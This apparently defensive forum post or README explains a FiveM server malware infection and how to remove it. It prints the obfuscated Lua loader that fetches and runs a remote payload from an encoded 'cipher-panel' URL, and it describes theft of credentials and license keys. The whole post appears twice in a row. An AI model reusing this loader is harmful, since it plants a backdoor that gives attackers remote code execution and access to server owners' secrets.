What this Malware/RAT doing ?
it generates obfuscated shit code like this :
local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x54\x48\x4a\x58\x67\x37", function (mMXHvjYgMEtGKcHqzKgfgEIRqKBgXRKwKfMaUTsiIbVjqVAIeJlcSKEMRZerHZUwyHKDxv, aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL) if (aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[6] or aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[5]) then return end llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[2]](llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[3]](aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL))() end)
in every .lua file in your server also After this shit code is run, it will upload some javascript and override existing files within the system builders directory.
resources\[system]\[builders] <---- if you dont have this directory i wiil tell you what you can do to remove the malware
The code will start propagating itself within all of your resources and files within the FiveM server installation to make it difficult to remove.
At this stage, its armageddon and all files within the server are compromised meaning files can be downloaded, uploaded, edited and viewed, including but not limited to just the server.cfg, sql credentials or even steal your cfx license keys. They’re also able to run remote code on the server which leads to the last step. The MalScanner batch file in this repository aims to show you exactly where the infected code is.
HOW TO REMOVE IT ?
1. Import all the resources files in to your visual studio like this :
(Select your resources folder only!)
First Step DONE
2. Stop Your Server Clear your Cache and Search about this : = {"\
How to check all resources?
simple do as i will show you in picture
remove every kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY =
3. DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2) webpack
3) yarn
4. Redownload the resources from here :
FOR YARN AND WEBPACK : cfx-server-data/resources at master · citizenfx/cfx-server-data
FOR XSOUND : GitHub - Xogy/xsound: Improved audio library for FiveM
5 Be sure you dont have any kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\ (the its random for every victim this is just an example)
in your resources because it will spread again and again and again
I have supplied two tools, one is a malware scanner that can searches for obfuscated code like above, just place it in your resources folder and run as administrator, and the network block if for vps/homehosted, once run it will block network connection to the known panels these hackers use to ruin your assets
6. Start Your server !
it generates obfuscated shit code like this :
local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x54\x48\x4a\x58\x67\x37", function (mMXHvjYgMEtGKcHqzKgfgEIRqKBgXRKwKfMaUTsiIbVjqVAIeJlcSKEMRZerHZUwyHKDxv, aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL) if (aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[6] or aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[5]) then return end llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[2]](llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[3]](aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL))() end)
in every .lua file in your server also After this shit code is run, it will upload some javascript and override existing files within the system builders directory.
resources\[system]\[builders] <---- if you dont have this directory i wiil tell you what you can do to remove the malware
The code will start propagating itself within all of your resources and files within the FiveM server installation to make it difficult to remove.
At this stage, its armageddon and all files within the server are compromised meaning files can be downloaded, uploaded, edited and viewed, including but not limited to just the server.cfg, sql credentials or even steal your cfx license keys. They’re also able to run remote code on the server which leads to the last step. The MalScanner batch file in this repository aims to show you exactly where the infected code is.
HOW TO REMOVE IT ?
1. Import all the resources files in to your visual studio like this :
(Select your resources folder only!)
First Step DONE
2. Stop Your Server Clear your Cache and Search about this : = {"\
How to check all resources?
simple do as i will show you in picture
remove every kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY =
3. DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2) webpack
3) yarn
4. Redownload the resources from here :
FOR YARN AND WEBPACK : cfx-server-data/resources at master · citizenfx/cfx-server-data
FOR XSOUND : GitHub - Xogy/xsound: Improved audio library for FiveM
5 Be sure you dont have any kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\ (the its random for every victim this is just an example)
in your resources because it will spread again and again and again
I have supplied two tools, one is a malware scanner that can searches for obfuscated code like above, just place it in your resources folder and run as administrator, and the network block if for vps/homehosted, once run it will block network connection to the known panels these hackers use to ruin your assets
6. Start Your server !
Update this post
